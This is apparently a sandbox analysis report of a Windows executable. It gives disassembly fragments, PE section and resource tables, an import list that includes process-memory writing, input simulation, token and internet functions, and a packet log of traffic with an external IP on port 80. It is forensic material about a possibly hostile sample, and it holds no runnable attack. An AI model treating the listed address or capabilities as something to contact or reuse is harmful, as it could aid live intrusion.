                                                          mov dword ptr [ebx], ecx
                                                          dec eax
                                                          lea edx, dword ptr [ebx+08h]
                                                          xor ecx, ecx
                                                          dec eax
                                                          mov dword ptr [edx], ecx
                                                          dec eax
                                                          mov dword ptr [edx+08h], ecx
                                                          dec eax
                                                          lea ecx, dword ptr [eax+08h]
                                                          call 00007F48CD232949h
                                                          dec eax
                                                          lea eax, dword ptr [0009467Dh]
                                                          dec eax
                                                          mov dword ptr [ebx], eax
                                                          dec eax
                                                          mov eax, ebx
                                                          dec eax
                                                          add esp, 20h
                                                          pop ebx
                                                          ret
                                                          int3
                                                          dec eax
                                                          and dword ptr [ecx+10h], 00000000h
                                                          dec eax
                                                          lea eax, dword ptr [00094674h]
                                                          dec eax
                                                          mov dword ptr [ecx+08h], eax
                                                          dec eax
                                                          lea eax, dword ptr [00094659h]
                                                          dec eax
                                                          mov dword ptr [ecx], eax
                                                          dec eax
                                                          mov eax, ecx
                                                          ret
                                                          int3
                                                          int3
                                                          inc eax
                                                          push ebx
                                                          dec eax
                                                          sub esp, 20h
                                                          dec eax
                                                          mov ebx, ecx
                                                          dec eax
                                                          mov eax, edx
                                                          dec eax
                                                          lea ecx, dword ptr [0009460Dh]
                                                          dec eax
                                                          mov dword ptr [ebx], ecx
                                                          dec eax
                                                          lea edx, dword ptr [ebx+08h]
                                                          xor ecx, ecx
                                                          dec eax
                                                          mov dword ptr [edx], ecx
                                                          dec eax
                                                          mov dword ptr [edx+08h], ecx
                                                          dec eax
                                                          lea ecx, dword ptr [eax+08h]
                                                          call 00007F48CD2328E9h
                                                          dec eax
                                                          lea eax, dword ptr [00094645h]
                                                          dec eax
                                                          mov dword ptr [ebx], eax
                                                          dec eax
                                                          mov eax, ebx
                                                          dec eax
                                                          add esp, 20h
                                                          pop ebx
                                                          ret
                                                          int3
                                                          dec eax
                                                          and dword ptr [ecx+10h], 00000000h
                                                          dec eax
                                                          lea eax, dword ptr [0009463Ch]
                                                          dec eax
                                                          mov dword ptr [ecx+08h], eax
                                                          dec eax
                                                          lea eax, dword ptr [00000021h]
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xe5c100x17c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xfb0000x140fc.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0xf40000x6f48.pdata
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000xa74.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xc70500x1c.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0xd9aa00x28.rdata
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc70700x100.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0xb50000x1138.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000xb33280xb3400507a8505198e35cc9675301d53e3b1c4False0.5503358721234309data6.5212967575920215IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0xb50000x342040x344009eda36be0cf076085a2f9772c1ee5803False0.30884139503588515data5.360588077813426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0xea0000x91200x5000ec6b77d6ef8898b0d3b7d48c042d66a0False0.040673828125DOS executable (block device driver)0.5749243362866429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .pdata0xf40000x6f480x70004416e27f8be9f9271c439d2fd34d1b2dFalse0.49612862723214285data5.911479421450324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .rsrc0xfb0000x140fc0x14200198dc241f7487065c4c479abbd151255False0.19349281832298137data4.2465033983096605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x1100000xa740xc005ddb0e422ace102fe530e589a0cbec6fFalse0.4850260416666667data5.139847116863034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xfb4580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xfb5800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xfb6a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xfb7d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/mEnglishGreat Britain0.14468236129184905
                                                          RT_MENU0x10bff80x50dataEnglishGreat Britain0.9
                                                          RT_STRING0x10c0480x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0x10c5dc0x68adataEnglishGreat Britain0.2735961768219833
                                                          RT_STRING0x10cc680x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0x10d0f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0x10d6f40x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0x10dd500x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0x10e1b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0x10e3100x8cedata1.0048802129547472
                                                          RT_GROUP_ICON0x10ebe00x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x10ebf40x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x10ec080x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x10ec1c0x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x10ec300xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x10ed0c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                          DLLImport
                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext
                                                          USER32.dllGetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, IsCharLowerW, IsCharAlphaNumericW, IsCharAlphaW, GetKeyboardLayoutNameW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, SetMenuDefaultItem, CloseClipboard, GetWindowRect, SetUserObjectSecurity, IsClipboardFormatAvailable, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, OpenClipboard, GetWindowLongPtrW
                                                          GDI32.dllEndPath, DeleteObject, GetDeviceCaps, ExtCreatePen, StrokePath, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, GetTextExtentPoint32W, CreateCompatibleBitmap, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StretchBlt, SelectObject, CreateCompatibleDC, StrokeAndFillPath
                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegSetValueExW, GetSecurityDescriptorDacl, GetAclInformation, RegCreateKeyExW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW, GetUserNameW
                                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                          OLEAUT32.dllVariantChangeType, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, VariantTimeToSystemTime, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, VariantInit, VariantClear, VariantCopy, SysAllocString, SafeArrayCreateVector, VarR8FromDec, SafeArrayAllocDescriptorEx, SafeArrayAllocData, SysStringLen, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, SysReAllocString, SafeArrayAccessData
                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 18, 2024 09:32:32.777821064 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:32.897525072 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:32.897629976 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:32.931509972 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:33.050993919 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390120029 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390213013 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390279055 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390285015 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.390295982 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390345097 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.390469074 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390485048 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390501022 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390517950 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390546083 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.390571117 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.390594006 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390609980 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.390671015 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.510024071 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.510062933 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.510159969 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.514090061 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.562901974 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.597851992 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.597934961 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.598005056 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.601958036 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.602056026 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.602114916 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.610382080 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.610491991 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.610573053 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.618774891 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.618854046 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.618911982 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.627192020 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.627263069 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.627337933 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.635499954 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.635639906 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.635696888 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.643847942 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.643937111 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.643990040 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.652282000 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.652364969 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.652421951 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.660561085 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.660691977 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.660789967 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.668925047 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.669095039 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.669171095 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.685841084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.685857058 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.686050892 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.805985928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.806092978 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.806166887 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.808535099 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.808650017 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.808711052 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.813467026 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.813590050 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.813653946 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.818037987 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.818161964 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.818253040 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.823443890 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.823472023 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.823580027 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.828677893 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.828732014 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.828788996 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.833888054 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.833950996 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.834007978 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.839170933 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.839247942 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.839298964 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.844465971 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.844530106 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.844594002 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.849868059 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.849885941 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.849950075 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.855053902 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.855164051 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.855225086 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.860429049 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.860445976 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.860510111 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.865638971 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.865787983 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.865849018 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.871134996 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.871161938 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.871229887 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.876329899 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.876422882 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.876487970 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.881614923 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:34.922262907 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:34.996917009 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.013734102 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.013814926 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.013858080 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.015026093 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.015088081 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.015086889 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.019740105 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.019813061 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.019829035 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.024450064 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.024514914 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.024517059 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.028656960 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.028718948 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.028723955 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.032772064 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.032840014 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.032881021 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.037261009 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.037327051 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.037342072 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.041656017 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.041704893 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.041723013 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.046108007 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.046186924 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.046235085 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.050543070 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.050606966 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.050659895 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.054990053 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.055052042 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.055111885 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.059453964 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.059525013 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.059567928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.063852072 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.063934088 CET4973080192.168.2.4139.99.188.124
